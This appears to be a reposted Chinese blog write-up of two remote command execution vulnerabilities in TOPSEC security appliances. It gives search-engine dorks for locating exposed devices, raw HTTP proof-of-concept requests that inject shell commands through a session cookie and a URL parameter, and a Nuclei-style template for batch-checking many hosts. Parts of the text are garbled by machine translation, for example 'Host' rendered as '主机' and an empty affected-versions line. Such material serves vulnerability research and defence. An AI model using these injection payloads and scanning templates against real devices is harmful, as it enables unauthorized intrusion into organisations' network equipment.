漏洞复现--天融信TOPSEC两处远程命令执行

# 免责声明：

**文中涉及的漏洞已修复，敏感信息已编码。文章仅供经验分享。别当真。未经授权的攻击是违法的！文章中的敏感信息已经过多个级别的处理。因传播、使用本文提供的信息而造成的任何直接或间接的后果和损失均由用户自行承担。作者对此不承担任何责任。一切后果请自行承担。 **

## 1：漏洞描述

天融信是中国领先的网络安全解决方案提供商之一。专注于网络安全技术和产品的研发、生产和服务，为政府机构、企业和个人用户提供全面的网络安全解决方案。

## 2：受漏洞影响的版本

天融信天融信

## 三：网络空间地图查询

福发:

`title=\'Web 用户登录\' body=\'/cgi/maincgi.cgi?Url=VerifyCode\'`

##四：漏洞复现1

POC1:

````

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1

主机: X.X.X.X

Cookie: session_id_443=1|回显“漏洞！” /www/htdocs/site/image/vul.txt；

User-Agent: Mozilla/5.0（Windows NT 6.4；WOW64）AppleWebKit/537.36（KHTML，如Gecko）Chrome/41.0.2225.0 Safari/537.36

``

访问/site/image/vul.txt

##五：批量检验

````

id: Trx-topsec-maincgi-cookie-rce

信息:

name: Trx-topsec-maincgi-cookie-rce

作者: 奶酪土拨鼠

严重性: 严重

description: 天融信（天融信）是中国领先的网络安全解决方案提供商之一。专注于网络安全技术和产品的研发、生产和服务，为政府机构、企业和个人用户提供全面的网络安全解决方案。

变量:

file_name: \'{{to_lower(rand_text_alpha(6))}}\'

file_content: \'{{to_lower(rand_text_alpha(15))}}\'

请求:

- 原始:

- |+

GET /cgi/maincgi.cgi?Url=aa HTTP/1.1

Host: {{主机名}}

Cookie: session_id_443=1|echo '{{file_content}}' /www/htdocs/site/image/{{file_name}}.txt;

User-Agent: Mozilla/5.0（Windows NT 6.4；WOW64）AppleWebKit/537.36（KHTML，如Gecko）Chrome/41.0.2225.0 Safari/537.36

- |

获取/site/image/{{file_name}}.txt HTTP/1.1

Host: {{主机名}}

User-Agent: Mozilla/5.0（Windows NT 6.4；WOW64）AppleWebKit/537.36（KHTML，如Gecko）Chrome/41.0.2225.0 Safari/537.36

匹配器:

- : DSL 型

DSL:

- \'status_code_1==200 status_code_2==200 contains(body_2, '{{file_content}}')\'

``

##：漏洞复现2

佛法：

`app=\'天融信-上网行为管理系统\'`

POC:

````

GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'漏洞！'%20%20/var/www/html/vul.txt%0A HTTP/1.1

主机: X.X.X.X

User-Agent: Mozilla/5.0（Windows NT 6.3；WOW64）AppleWebKit/537.36（KHTML，如Gecko）Chrome/41.0.2225.0 Safari/537.36

``

访问vul.txt

转载自freebuf：[https://www.freebuf.com/articles/web/388740.html](https://www.freebuf.com/articles/web/388740.html) 作者：Cheese Marmot